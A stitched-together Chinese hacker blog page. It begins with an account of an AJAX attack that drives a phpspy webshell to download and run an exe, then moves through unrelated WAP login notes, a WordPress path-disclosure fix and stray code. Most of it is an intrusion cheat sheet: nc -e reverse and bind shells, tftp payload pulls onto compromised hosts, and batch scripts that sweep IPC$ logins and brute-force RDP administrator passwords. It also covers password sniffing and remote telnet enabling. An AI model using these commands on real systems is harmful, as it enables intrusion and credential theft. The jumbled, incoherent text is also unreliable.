还是记录一下吧，ajax真的是隐秘性很高。我是这样来利用的。比较彻底。

加了一段代码是生成一个VBS脚本。这段脚本的作用从4ngel.net上下载一个1.exe文件保存到他本地的1.exe，然后有一段是AJAX的功能代码。

最后几句是以POST方式请求本地测试环境中的phpspy2008，调用命令执行功能，生成vbs，然后执行VBS。再执行下载的exe文件。不过我已经注释掉了。这样在本地测试是成功的。对待自己兄弟们不能这么心狠。所以就注释掉了。加了一个用户。

我只是想说。AJAX作为一个现在逐渐受到重视的技术，在强调增加用户体验的同时，带来的安全也是神不知鬼不觉的。因为他的请求。你根本察觉不到。更具体的应用还是要靠大家自己去领悟了。

然后我查了网上的资料研究了一整天。查到一些有用的资料。
讨论地址：http://topic.csdn.net/t/20040826/09/3310602.html

结果发现有部分老的机器是不支持COOKIE的，然后我又下载了一些WAP浏览器来测试，结果发现，COOKIE的确没有保存。提示登陆成功，却没有COOKIE信息。说明不支持COOKIE，COOKIE是客户端的，而SESSION保存在服务器上，应该没有问题的吧，为了避免某些服务器SESSION设置不正常，我还特地指定了SESSION的保存目录。结果测试。我手中的智能手机，非常正常，还有两个WAP测试软件非常正常，而问朋友借的老款的，自带WAP浏览器的手机却不支持。登陆成功却没有读取到SESSION信息。然后用winwap4.0来测试，居然也读取不到SESSION信息。用OPERA也非常正常。记得以前BOB的掌上版是用SESSION纪录信息的，我下载来研究研究是怎么样的机制，结果没有想到，老款的手机和winwap，居然没有办法读取到SESSION信息。BOB的掌上版同样登陆成功后，由于SESSION读取失败，还是未登陆状态。同样，下载F2BLOG的WAP来测试。和BOB掌上版也一样的结果。

看来要达到通用，只有采用URL传递的方法，这样可以完全脱离COOKIE和SESSION，而直接采用数据库的方法，这样就可以保证无论在何种浏览器下，何种手机下，都可以正常使用的了。

Sablog-X 1.6版本不会包含WAP功能，而单独打包此功能。作为插件发布。而有空，我要和Bo-blog的作者BOB和F2blog的开发团队交流交流。统一一下插件的接口标准。和模块。争取一些简单的不设计数据库操作的插件，可以在三个程序上达到通用的目的。

PS：刚才还想看看几个论坛的WAP功能，是否有问题，结果发现PHPWIND的WAP功能，是采用COOKIE验证，所以老款手机和winwap都无法读取COOKIE信息，登陆成功了还是未登陆状态。而Discuz和Molyx则采用URL传递参数的办法，所以在任何环境下，WAP功能都非常正常。

今天看了看wordpress模板的机制，发现存在了漏洞。大家可以认为这个漏洞不要紧。但是配合其他漏洞可以拿下WEB空间。权限允许可以拿下主机。

好久没有写漏洞的文章了，忘记格式了，呵呵，随便写写。

wordpress的模板文件，缺少访问验证，直接访问模板里的文件，就会泄露物理路径。这个不是PHP漏洞，是WordPress的漏洞。

比如访问:http://hostname/wordpress/wp-content/themes/default

就会显示:

Fatal error: Unknown function: get_header() in /home/public_html/yz/wp-content/themes/default/index.php on line 1

解决办法

在模板里的文件头部加上以下代码，可以防止泄露路径。

<?php
if(!defined('WP_USE_THEMES')) {
    exit('Access Denied');
}
?>

<script language="JavaScript">
<!--
window.onload=fiximage;
function fiximage() {
    var max=600;
    imgs = document.getElementsByTagName('img');
    for(i=0;i<imgs.length;i++) {
    w=imgs[i].width;h=imgs[i].height;
    if(w>max) { imgs[i].width=max;imgs[i].height=h/(w/max);}
    }
}
//-->
</script>

if($adminid == 3) {
    if($accessmasks) {
    $accessadd1 = ', a.allowview, a.allowpost, a.allowreply, a.allowgetattach, a.allowpostattach';
    $accessadd2 = "LEFT JOIN {$tablepre}access a ON a.uid='$discuz_uid' AND a.fid='$moveto'";
    }
    $query = $db->query("SELECT ff.postperm, m.uid AS istargetmod $accessadd1
    FROM {$tablepre}forumfields ff
    $accessadd2
    LEFT JOIN {$tablepre}moderators m ON m.fid='$moveto' AND m.uid='$discuz_uid'
    WHERE ff.fid='$moveto'");
    $priv = $db->fetch_array($query);
    if((($priv['postperm'] && !in_array($groupid, explode("\t", $priv['postperm']))) || ($accessmasks && ($priv['allowview'] || $priv['allowreply'] || $priv['allowgetattach'] || $priv['allowpostattach']) && !$priv['allowpost'])) && !$priv['istargetmod']) {
    showmessage('admin_copy_nopermission');
    }
}

1.1 build 20060611的版本就存在漏洞。因为我当时也懒，也忙，想着反正没有利用工具，没多少人会伪造。现在工具出来了，我还是和大家说对不起。这么晚才放出新版本。

相信很多程序都会用到X-Forwarded-For来获取IP信息。而且要么对数据库读写，要么对文件读写。所以注入漏洞、写文件漏洞到处是。如果自己写程序的朋友。还是看看有没有过滤疏忽的地方。

附件为通用型Exp，会构造语句的就很容易用啦。

#2 二：

del /S /Q 目录 或用：rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。（二个命令作用相同）
move 盘符\路径\要移动的文件名　存放移动文件的路径\移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖
fc one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中，"> "和"> >" 是重定向命令
at id号 开启已注册的某个计划任务
at /delete 停止所有计划任务，用参数/yes则不需要确认就直接停止
at id号 /delete 停止某个已注册的计划任务
at 查看所有的计划任务
at \\ip time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机
finger username @host 查看最近有哪些用户登陆
telnet ip 端口 远和登陆服务器,默认端口为23
open ip 连接到IP（属telnet登陆后的命令）
telnet 在本机上直接键入telnet 将进入本机的telnet
copy 路径\文件名1　路径\文件名2 /y 复制文件1到指定的目录为文件2，用参数/y就同时取消确认你要改写一份现存目录文件
copy c:\srv.exe \\ip\admin$ 复制本地c:\srv.exe到对方的admin下
cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件，注：2st.txt文件头要空三排，参数：/b指二进制文件，/a指ASCLL格式文件
copy \\ip\admin$\svv.exe c:\ 或:copy\\ip\admin$\*.* 复制对方admini$共享下的srv.exe文件（所有文件）至本地C：
xcopy 要复制的文件或目录树　目标地址\目录名 复制文件和目录树，用参数/Y将不提示覆盖相同文件
tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe 登陆后，将“IP”的server.exe下载到目标主机c:\server.exe 参数：-i指以二进制模式传送，如传送exe文件时用，如不加-i 则以ASCII模式（传送文本文件模式）进行传送
tftp -i 对方IP　put c:\server.exe 登陆后，上传本地c:\server.exe至主机
ftp ip 端口 用于上传文件至服务器或进行文件操作，默认端口为21。bin指用二进制方式传送（可执行文件进）；默认为ASCII格式传送(文本文件时)
route print 显示出IP路由，将主要显示网络地址Network addres，子网掩码Netmask，网关地址Gateway addres，接口地址Interface
arp 查看和处理ARP缓存，ARP是名字解析的意思，负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息
start 程序名或命令 /max 或/min 新开一个新窗口并最大化（最小化）运行某程序或命令
mem 查看cpu使用情况
attrib 文件名(目录名) 查看某文件（目录）的属性
attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档，只读，系统，隐藏 属性；用＋则是添加为某属性
dir 查看文件，参数：/Q显示文件及目录属系统哪个用户，/T:C显示文件创建时间，/T:A显示文件上次被访问时间，/T:W上次被修改时间
date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间，而不必输入新日期和时间
set 指定环境变量名称=要指派给变量的字符 设置环境变量
set 显示当前所有的环境变量
set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量
pause 暂停批处理程序，并显示出：请按任意键继续....
if 在批处理程序中执行条件处理（更多说明见if命令及变量）
goto 标签 将cmd.exe导向到批处理程序中带标签的行（标签必须单独一行，且以冒号打头，例如：“：start”标签）
call 路径\批处理文件名 从批处理程序中调用另一个批处理程序 （更多说明见call /?）
for 对一组文件中的每一个文件执行某个特定命令（更多说明见for命令及变量）
echo on或off 打开或关闭echo，仅用echo不加参数则显示当前echo设置
echo 信息 在屏幕上显示出信息
echo 信息 >> pass.txt 将"信息"保存到pass.txt文件中
findstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello
find 文件名 查找某文件
title 标题名字 更改CMD窗口标题名字
color 颜色值 设置cmd控制台前景和背景颜色；0＝黑、1＝蓝、2＝绿、3＝浅绿、4＝红、5＝紫、6＝黄、7=白、8=灰、9=淡蓝、A＝淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白
prompt 名称 更改cmd.exe的显示的命令提示符(把C:\、D:\统一改为：EntSky\ )

#3 三：

ver 在DOS窗口下显示版本信息
winver 弹出一个窗口显示版本信息（内存大小、系统版本、补丁版本、计算机名）
format 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例：Format D: /FS:NTFS
md　目录名 创建目录
replace 源文件　要替换文件的目录 替换文件
ren 原文件名　新文件名 重命名文件名
tree 以树形结构显示出目录，用参数-f 将列出第个文件夹中文件名称
type 文件名 显示文本文件的内容
more 文件名 逐屏显示输出文件
doskey 要锁定的命令＝字符
doskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行，重新调用win2k命令，并创建宏)。如：锁定dir命令：doskey dir=entsky (不能用doskey dir=dir)；解锁：doskey dir=
taskmgr 调出任务管理器
chkdsk /F D: 检查磁盘D并显示状态报告；加参数/f并修复磁盘上的错误
tlntadmn telnt服务admn,键入tlntadmn选择3，再选择8,就可以更改telnet服务默认端口23为其它任何端口
exit 退出cmd.exe程序或目前，用参数/B则是退出当前批处理脚本而不是cmd.exe
path 路径\可执行文件的文件名 为可执行文件设置一个路径。
cmd 启动一个win2K命令解释窗口。参数：/eff、/en 关闭、开启命令扩展；更我详细说明见cmd /?
regedit /s 注册表文件名 导入注册表；参数/S指安静模式导入，无任何提示；
regedit /e 注册表文件名 导出注册表
cacls 文件名　参数 显示或修改文件访问控制列表（ACL）——针对NTFS格式时。参数：/D 用户名:设定拒绝某用户访问；/P 用户名:perm 替换指定用户的访问权限；/G 用户名:perm 赋予指定用户访问权限；Perm 可以是: N 无，R 读取， W 写入， C 更改(写入)，F 完全控制；例：cacls D:\test.txt /D pub 设定d:\test.txt拒绝pub用户访问。
cacls 文件名 查看文件的访问用户权限列表
REM 文本内容 在批处理文件中添加注解
netsh 查看或更改本地网络配置情况

#4 四：

IIS服务命令：
iisreset /reboot 重启win2k计算机（但有提示系统将重启信息出现）
iisreset /start或stop 启动（停止）所有Internet服务
iisreset /restart 停止然后重新启动所有Internet服务
iisreset /status 显示所有Internet服务状态
iisreset /enable或disable 在本地系统上启用（禁用）Internet服务的重新启动
iisreset /rebootonerror 当启动、停止或重新启动Internet服务时，若发生错误将重新开机
iisreset /noforce 若无法停止Internet服务，将不会强制终止Internet服务
iisreset /timeout Val在到达逾时间（秒）时，仍未停止Internet服务，若指定/rebootonerror参数，则电脑将会重新开机。预设值为重新启动20秒，停止60秒，重新开机0秒。
FTP 命令： (后面有详细说明内容)
ftp的命令行格式为:
ftp －v －d －i －n －g[主机名] －v 显示远程服务器的所有响应信息。
－d 使用调试方式。
－n 限制ftp的自动登录,即不使用.netrc文件。
－g 取消全局文件名。
help [命令] 或 ？[命令] 查看命令说明
bye 或 quit 终止主机FTP进程,并退出FTP管理方式.
pwd 列出当前远端主机目录
put 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端主机中
get 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中
mget [remote-files] 从远端主机接收一批文件至本地主机
mput local-files 将本地主机中一批文件传送至远端主机
dir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件
ascii 设定以ASCII方式传送文件(缺省值)
bin 或 image 设定以二进制方式传送文件
bell 每完成一次文件传送,报警提示
cdup 返回上一级目录
close 中断与远程服务器的ftp会话(与open对应)
open host[port] 建立指定ftp服务器连接,可指定连接端口
delete 删除远端主机中的文件
mdelete [remote-files] 删除一批文件
mkdir directory-name 在远端主机中建立目录
rename [from] [to] 改变远端主机中的文件名
rmdir directory-name 删除远端主机中的目录
status 显示当前FTP的状态
system 显示远端主机系统类型
user user-name [password] [account] 重新以别的用户名登录远端主机
open host [port] 重新建立一个新的连接
prompt 交互提示模式
macdef 定义宏命令
lcd 改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录
chmod 改变远端主机的文件权限
case 当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母
cd remote－dir 进入远程主机目录
cdup 进入远程主机目录的父目录
! 在本地机中执行交互shell，exit回到ftp环境,如!ls＊.zip

#5 五：

MYSQL 命令：
mysql -h主机地址 -u用户名 －p密码 连接MYSQL;如果刚安装好MYSQL，超级用户root是没有密码的。
（例：mysql -h110.110.110.110 -Uroot -P123456
注:u与root可以不用加空格，其它也一样）
exit 退出MYSQL
mysqladmin -u用户名 -p旧密码 password 新密码 修改密码
grant select on 数据库.* to 用户名@登录主机 identified by \"密码\"; 增加新用户。（注意：和上面不同，下面的因为是MYSQL环境中的命令，所以后面都带一个分号作为命令结束符）
show databases; 显示数据库列表。刚开始时才两个数据库：mysql和test。mysql库很重要它里面有MYSQL的系统信息，我们改密码和新增用户，实际上就是用这个库进行操作。
use mysql；
show tables; 显示库中的数据表
describe 表名; 显示数据表的结构
create database 库名; 建库
use 库名；
create table 表名 (字段设定列表)； 建表
drop database 库名;
drop table 表名； 删库和删表
delete from 表名; 将表中记录清空
select * from 表名; 显示表中的记录
mysqldump --opt school>school.bbb 备份数据库：（命令在DOS的\\mysql\\bin目录下执行）;注释:将数据库school备份到school.bbb文件，school.bbb是一个文本文件，文件名任取，打开看看你会有新发现。
win2003系统下新增命令（实用部份）：
shutdown /参数 关闭或重启本地或远程主机。
参数说明：/S 关闭主机，/R 重启主机， /T 数字 设定延时的时间，范围0～180秒之间， /A取消开机，/M //IP 指定的远程主机。
例：shutdown /r /t 0 立即重启本地主机（无延时）
taskill /参数 进程名或进程的pid 终止一个或多个任务和进程。
参数说明：/PID 要终止进程的pid,可用tasklist命令获得各进程的pid，/IM 要终止的进程的进程名，/F 强制终止进程，/T 终止指定的进程及他所启动的子进程。
tasklist 显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符(PID)。
参数说明：/M 列出当前进程加载的dll文件，/SVC 显示出每个进程对应的服务，无参数时就只列出当前的进程。

#6 六：

Linux系统下基本命令： 要区分大小写
uname 显示版本信息（同win2K的 ver）
dir 显示当前目录文件,ls -al 显示包括隐藏文件（同win2K的 dir）
pwd 查询当前所在的目录位置
cd cd　..回到上一层目录，注意cd 与..之间有空格。cd　/返回到根目录。
cat 文件名 查看文件内容
cat >abc.txt 往abc.txt文件中写上内容。
more 文件名 以一页一页的方式显示一个文本文件。
cp 复制文件
mv 移动文件
rm 文件名 删除文件，rm -a 目录名删除目录及子目录
mkdir 目录名 建立目录
rmdir 删除子目录，目录内没有文档。
chmod 设定档案或目录的存取权限
grep 在档案中查找字符串
diff 档案文件比较
find 档案搜寻
date 现在的日期、时间
who 查询目前和你使用同一台机器的人以及Login时间地点
w 查询目前上机者的详细资料
whoami 查看自己的帐号名称
groups 查看某人的Group
passwd 更改密码
history 查看自己下过的命令
ps 显示进程状态
kill 停止某进程
gcc 黑客通常用它来编译C语言写的文件
su 权限转换为指定使用者
telnet IP telnet连接对方主机（同win2K），当出现bash$时就说明连接成功。
ftp ftp连接上某服务器（同win2K）

附：批处理命令与变量

1：for命令及变量 基本格式：
FOR /参数 %variable IN (set) DO command [command_parameters] %variable:指定一个单一字母可替换的参数，如：%i ，而指定一个变量则用：%%i ，而调用变量时用：%i% ，变量是区分大小写的（%i 不等于 %I）。
批处理每次能处理的变量从%0—%9共10个，其中%0默认给批处理文件名使用，%1默认为使用此批处理时输入的的第一个值，同理：%2—%9指输入的第2-9个值；例：net use \\ip\ipc$ pass /user:user 中ip为%1,pass为%2 ,user为%3

(set):指定一个或一组文件，可使用通配符，如：(D:\user.txt)和(1 1 254)(1 -1 254),{ “(1 1 254)”第一个"1"指起始值，第二个"1"指增长量，第三个"254"指结束值，即：从1到254；“(1 -1 254)”说明：即从254到1 }

command：指定对第个文件执行的命令，如：net use命令；如要执行多个命令时，命令这间加：& 来隔开
command_parameters：为特定命令指定参数或命令行开关

IN (set)：指在(set)中取值；DO command ：指执行command

参数：/L 指用增量形式{ (set)为增量形式时 }；/F 指从文件中不断取值，直到取完为止{ (set)为文件时，如(d:\pass.txt)时 }。
用法举例：
@echo off
echo 用法格式：test.bat *.*.* > test.txt

for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use \\%1.%%G /user:administrator | find "命令成功完成" >>test.txt
存为test.bat 说明：对指定的一个C类网段的254个IP依次试建立administrator密码为空的IPC$连接，如果成功就把该IP存在test.txt中。

/L指用增量形式（即从1-254或254-1）；输入的IP前面三位：*.*.*为批处理默认的 %1；%%G 为变量(ip的最后一位）；& 用来隔开echo 和net use 这二个命令；| 指建立了ipc$后，在结果中用find查看是否有"命令成功完成"信息；%1.%%G 为完整的IP地址；(1 1 254) 指起始值，增长量，结止值。
@echo off
echo 用法格式：ok.bat ip
FOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200
存为：ok.exe 说明：输入一个IP后，用字典文件d:\pass.dic来暴解d:\user.dic中的用户密码，直到文件中值取完为止。%%i为用户名；%1为输入的IP地址（默认）。

#7 七：

2：if命令及变量 基本格式：
IF [not] errorlevel 数字 命令语句 如果程序运行最后返回一个等于或大于指定数字的退出编码，指定条件为“真”。
例：IF errorlevel 0 命令 指程序执行后返回的值为0时，就值行后面的命令；IF not errorlevel 1 命令指程序执行最后返回的值不等于1，就执行后面的命令。
0 指发现并成功执行（真）；1 指没有发现、没执行（假）。
IF [not] 字符串1==字符串2 命令语句 如果指定的文本字符串匹配（即：字符串1 等于 字符串2），就执行后面的命令。
例：“if "%2%"=="4" goto start”指：如果输入的第二个变量为4时，执行后面的命令（注意：调用变量时就%变量名%并加" "）
IF [not] exist 文件名 命令语句 如果指定的文件名存在，就执行后面的命令。
例：“if not nc.exe goto end”指：如果没有发现nc.exe文件就跳到":end"标签处。
IF [not] errorlevel 数字 命令语句 else 命令语句或 IF [not] 字符串1==字符串2 命令语句 else 命令语句或 IF [not] exist 文件名 命令语句 else 命令语句 加上：else 命令语句后指：当前面的条件不成立时，就指行else后面的命令。注意：else 必须与 if 在同一行才有效。 当有del命令时需把del命令全部内容用< >括起来，因为del命令要单独一行时才能执行，用上< >后就等于是单独一行了；例如：“if exist test.txt. <del test.txt.> else echo test.txt.missing ”，注意命令中的“.”

（二）系统外部命令(均需下载相关工具)：

1、瑞士军刀：nc.exe

参数说明：
-h 查看帮助信息
-d 后台模式
-e prog程序重定向，一但连接就执行［危险］
-i secs延时的间隔
-l 监听模式，用于入站连接
-L 监听模式，连接天闭后仍然继续监听，直到CTR+C
-n IP地址，不能用域名
-o film记录16进制的传输
-p[空格]端口 本地端口号
-r 随机本地及远程端口
-t 使用Telnet交互方式
-u UDP模式
-v 详细输出，用-vv将更详细
-w数字 timeout延时间隔
-z 将输入，输出关掉（用于扫锚时）
基本用法：
nc -nvv 192.168.0.1 80 连接到192.168.0.1主机的80端口
nc -l -p 80 开启本机的TCP 80端口并监听
nc -nvv -w2 -z 192.168.0.1 80-1024 扫锚192.168.0.1的80-1024端口
nc -l -p 5354 -t -e c:winntsystem32cmd.exe 绑定remote主机的cmdshell在remote的TCP 5354端口
nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主机的cmdshell并反向连接192.168.0.2的5354端口
高级用法：
nc -L -p 80 作为蜜罐用1：开启并不停地监听80端口，直到CTR+C为止
nc -L -p 80 > c:\log.txt 作为蜜罐用2：开启并不停地监听80端口，直到CTR+C,同时把结果输出到c:\log.txt
nc -L -p 80 < c:\honeyport.txt 作为蜜罐用3-1：开启并不停地监听80端口，直到CTR+C,并把c:\honeyport.txt中内容送入管道中，亦可起到传送文件作用
type.exe c:\honeyport | nc -L -p 80 作为蜜罐用3-2：开启并不停地监听80端口，直到CTR+C,并把c:\honeyport.txt中内容送入管道中,亦可起到传送文件作用
本机上用：nc -l -p 本机端口
在对方主机上用：nc -e cmd.exe 本机IP -p 本机端口 *win2K
nc -e /bin/sh 本机IP -p 本机端口 *linux,unix 反向连接突破对方主机的防火墙
本机上用：nc -d -l -p 本机端口 < 要传送的文件路径及名称
在对方主机上用：nc -vv 本机IP 本机端口 > 存放文件的路径及名称 传送文件到对方主机
备 注：
| 管道命令
< 或 > 重定向命令。“<”，例如：tlntadmn < test.txt 指把test.txt的内容赋值给tlntadmn命令
＠ 表示执行＠后面的命令，但不会显示出来（后台执行）；例：＠dir c:\winnt >> d:\log.txt 意思是：后台执行dir，并把结果存在d:\log.txt中
>与>>的区别 　">"指：覆盖；">>"指：保存到(添加到）。
如：@dir c:\winnt >> d:\log.txt和@dir c:\winnt > d:\log.txt二个命令分别执行二次比较看：用>>的则是把二次的结果都保存了，而用：>则只有一次的结果，是因为第二次的结果把第一次的覆盖了。

#8 八：

2、扫锚工具：xscan.exe

基本格式
xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项] 扫锚"起始IP到终止IP"段的所有主机信息
xscan -file <主机列表文件名> <检测项目> [其他选项] 扫锚"主机IP列表文件名"中的所有主机信息
检测项目
-active 检测主机是否存活
-os 检测远程操作系统类型（通过NETBIOS和SNMP协议）
-port 检测常用服务的端口状态
-ftp 检测FTP弱口令
-pub 检测FTP服务匿名用户写权限
-pop3 检测POP3-Server弱口令
-smtp 检测SMTP-Server漏洞
-sql 检测SQL-Server弱口令
-smb 检测NT-Server弱口令
-iis 检测IIS编码/解码漏洞
-cgi 检测CGI漏洞
-nasl 加载Nessus攻击脚本
-all 检测以上所有项目
其它选项
-i 适配器编号 设置网络适配器, <适配器编号>可通过"-l"参数获取
-l 显示所有网络适配器
-v 显示详细扫描进度
-p 跳过没有响应的主机
-o 跳过没有检测到开放端口的主机
　 -t 并发线程数量,并发主机数量 指定最大并发线程数量和并发主机数量, 默认数量为100,10
-log 文件名 指定扫描报告文件名 (后缀为：TXT或HTML格式的文件)
用法示例
xscan -host 192.168.1.1-192.168.255.255 -all -active -p　 检测192.168.1.1-192.168.255.255网段内主机的所有漏洞，跳过无响应的主机
xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o 检测192.168.1.1-192.168.255.255网段内主机的标准端口状态，NT弱口令用户，最大并发线程数量为150，跳过没有检测到开放端口的主机
xscan -file hostlist.txt -port -cgi -t 200,5 -v -o 检测“hostlist.txt”文件中列出的所有主机的标准端口状态，CGI漏洞，最大并发线程数量为200，同一时刻最多检测5台主机，显示详细检测进度，跳过没有检测到开放端口的主机

#9 九：

3、命令行方式嗅探器: xsniff.exe
可捕获局域网内FTP/SMTP/POP3/HTTP协议密码
参数说明
-tcp 输出TCP数据报
-udp 输出UDP数据报
-icmp 输出ICMP数据报
-pass 过滤密码信息
-hide 后台运行
-host 解析主机名
-addr IP地址 过滤IP地址
-port 端口 过滤端口
-log 文件名 将输出保存到文件
-asc 以ASCII形式输出
-hex 以16进制形式输出
用法示例
xsniff.exe -pass -hide -log pass.log 后台运行嗅探密码并将密码信息保存在pass.log文件中
xsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探192.168.1.1并过滤tcp和udp信息并以ASCII格式输出

4、终端服务密码破解: tscrack.exe

参数说明
-h 显示使用帮助
-v 显示版本信息
-s 在屏幕上打出解密能力
-b 密码错误时发出的声音
-t 同是发出多个连接（多线程）
-N Prevent System Log entries on targeted server
-U 卸载移除tscrack组件
-f 使用－f后面的密码
-F 间隔时间（频率）
-l 使用－l后面的用户名
-w 使用－w后面的密码字典
-p 使用－p后面的密码
-D 登录主页面
用法示例
tscrack 192.168.0.1 -l administrator -w pass.dic 远程用密码字典文件暴破主机的administrator的登陆密码
tscrack 192.168.0.1 -l administrator -p 123456 用密码123456远程登陆192.168.0.1的administrator用户
@if not exist ipcscan.txt goto noscan
@for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i
nscan
@echo 3389.txt no find or scan faild
(①存为3389.bat) （假设现有用SuperScan或其它扫锚器扫到一批开有3389的主机IP列表文件3389.txt)
3389.bat意思是：从3389.txt文件中取一个IP，接着运行hack.bat
@if not exist tscrack.exe goto noscan
@tscrack %1 -l administrator -w pass.dic >>rouji.txt
:noscan
@echo tscrack.exe no find or scan faild
(②存为hack.bat) (运行3389.bat就OK，且3389.bat、hack.bat、3389.txt、pass.dic与tscrack.exe在同一个目录下；就可以等待结果了)
hack.bat意思是：运行tscrack.exe用字典暴破3389.txt中所有主机的administrator密码，并将破解结果保存在rouji.txt文件中。

5、其它：

Shutdown.exe
Shutdown \\IP地址 t:20 20秒后将对方NT自动关闭（Windows 2003系统自带工具，在Windows2000下用进就得下载此工具才能用。在前面Windows 2003 DOS命令中有详细介绍。）
fpipe.exe (TCP端口重定向工具) 在第二篇中有详细说明（端口重定向绕过防火墙）
fpipe -l 80 -s 1029 -r 80 www.sina.com.cn 当有人扫锚你的80端口时，他扫到的结果会完全是www.sina.com.cn的主机信息
Fpipe -l 23 -s 88 -r 23 目标IP 把本机向目标IP发送的23端口Telnet请求经端口重定向后，就通过88端口发送到目标IP的23端口。（与目标IP建立Telnet时本机就用的88端口与其相连接）然后：直接Telnet 127.0.0.1（本机IP）就连接到目标IP的23端口了。
OpenTelnet.exe (远程开启telnet工具)
opentelnet.exe \\IP 帐号　密码　ntlm认证方式　Telnet端口 （不需要上传ntlm.exe破坏微软的身份验证方式）直接远程开启对方的telnet服务后，就可用telnet \\ip 连接上对方。
NTLM认证方式：０：不使用NTLM身份验证；１：先尝试NTLM身份验证，如果失败，再使用用户名和密码；２：只使用NTLM身份验证。

ResumeTelnet.exe (OpenTelnet附带的另一个工具)
resumetelnet.exe \\IP　帐号　密码 用Telnet连接完对方后，就用这个命令将对方的Telnet设置还原，并同时关闭Telnet服务。

#10 十：

6、FTP命令详解：

FTP命令是Internet用户使用最频繁的命令之一，熟悉并灵活应用FTP的内部命令，可以大大方便使用者，并收到事半功倍之效。如果你想学习使用进行后台FTP下载，那么就必须学习FTP指令。

FTP的命令行格式为：
ftp -v -d -i -n -g [主机名] ，其中

-v 显示远程服务器的所有响应信息；

-n 限制ftp的自动登录，即不使用；.n etrc文件；

-d 使用调试方式；

-g 取消全局文件名。

FTP使用的内部命令如下(中括号表示可选项):

1.![cmd[args]]：在本地机中执行交互shell，exit回到ftp环境，如：!ls*.zip
2.$ macro-ame[args]： 执行宏定义macro-name。

3.account[password]： 提供登录远程系统成功后访问系统资源所需的补充口令。
4.append local-file[remote-file]：将本地文件追加到远程系统主机，若未指定远程系统文件名，则使用本地文件名。

5.ascii：使用ascii类型传输方式。
6.bell：每个命令执行完毕后计算机响铃一次。

7.bin：使用二进制文件传输方式。
8.bye：退出ftp会话过程。

9.case：在使用mget时，将远程主机文件名中的大写转为小写字母。
10.cd remote-dir：进入远程主机目录。

11.cdup：进入远程主机目录的父目录。
12.chmod mode file-name：将远程主机文件file-name的存取方式设置为mode，如：chmod 777 a.out。

13.close：中断与远程服务器的ftp会话(与open对应)。
14.cr：使用asscii方式传输文件时，将回车换行转换为回行。

15.delete remote-file：删除远程主机文件。
16.debug[debug-value]：设置调试方式， 显示发送至远程主机的每条命令，如：deb up 3，若设为0，表示取消debug。

17.dir[remote-dir][local-file]：显示远程主机目录，并将结果存入本地文件。
18.disconnection：同close。

19.form format：将文件传输方式设置为format，缺省为file方式。
20.get remote-file[local-file]： 将远程主机的文件remote-file传至本地硬盘的local-file。

21.glob：设置mdelete，mget，mput的文件名扩展，缺省时不扩展文件名，同命令行的-g参数。
22.hash：每传输1024字节，显示一个hash符号(#)。

23.help[cmd]：显示ftp内部命令cmd的帮助信息，如：help get。
24.idle[seconds]：将远程服务器的休眠计时器设为[seconds]秒。

25.image：设置二进制传输方式(同binary)。
26.lcd[dir]：将本地工作目录切换至dir。

27.ls[remote-dir][local-file]：显示远程目录remote-dir， 并存入本地文件local-file。
28.macdef macro-name：定义一个宏，遇到macdef下的空行时，宏定义结束。

29.mdelete[remote-file]：删除远程主机文件。
30.mdir remote-files local-file：与dir类似，但可指定多个远程文件，如 ：mdir *.o.*.zipoutfile 。

31.mget remote-files：传输多个远程文件。
32.mkdir dir-name：在远程主机中建一目录。

33.mls remote-file local-file：同nlist，但可指定多个文件名。
34.mode[modename]：将文件传输方式设置为modename， 缺省为stream方式。

35.modtime file-name：显示远程主机文件的最后修改时间。
36.mput local-file：将多个文件传输至远程主机。

37.newer file-name： 如果远程机中file-name的修改时间比本地硬盘同名文件的时间更近，则重传该文件。
38.nlist[remote-dir][local-file]：显示远程主机目录的文件清单，并存入本地硬盘的local-file。

39.nmap[inpattern outpattern]：设置文件名映射机制， 使得文件传输时，文件中的某些字符相互转换， 如：nmap $1.$2.$3[$1，$2].[$2，$3]，则传输文件a1.a2.a3时，文件名变为a1，a2。 该命令特别适用于远程主机为非UNIX机的情况。
40.ntrans[inchars[outchars]]：设置文件名字符的翻译机制，如ntrans1R，则文件名LLL将变为RRR。

41.open host[port]：建立指定ftp服务器连接，可指定连接端口。
42.passive：进入被动传输方式。

43.prompt：设置多个文件传输时的交互提示。
44.proxy ftp-cmd：在次要控制连接中，执行一条ftp命令， 该命令允许连接两个ftp服务器，以在两个服务器间传输文件。第一条ftp命令必须为open，以首先建立两个服务器间的连接。
45.put local-file[remote-file]：将本地文件local-file传送至远程主机。
46.pwd：显示远程主机的当前工作目录。

47.quit：同bye，退出ftp会话。
48.quote arg1，arg2...：将参数逐字发至远程ftp服务器，如：quote syst.

49.recv remote-file[local-file]：同get。
50.reget remote-file[local-file]：类似于get， 但若local-file存在，则从上次传输中断处续传。

51.rhelp[cmd-name]：请求获得远程主机的帮助。
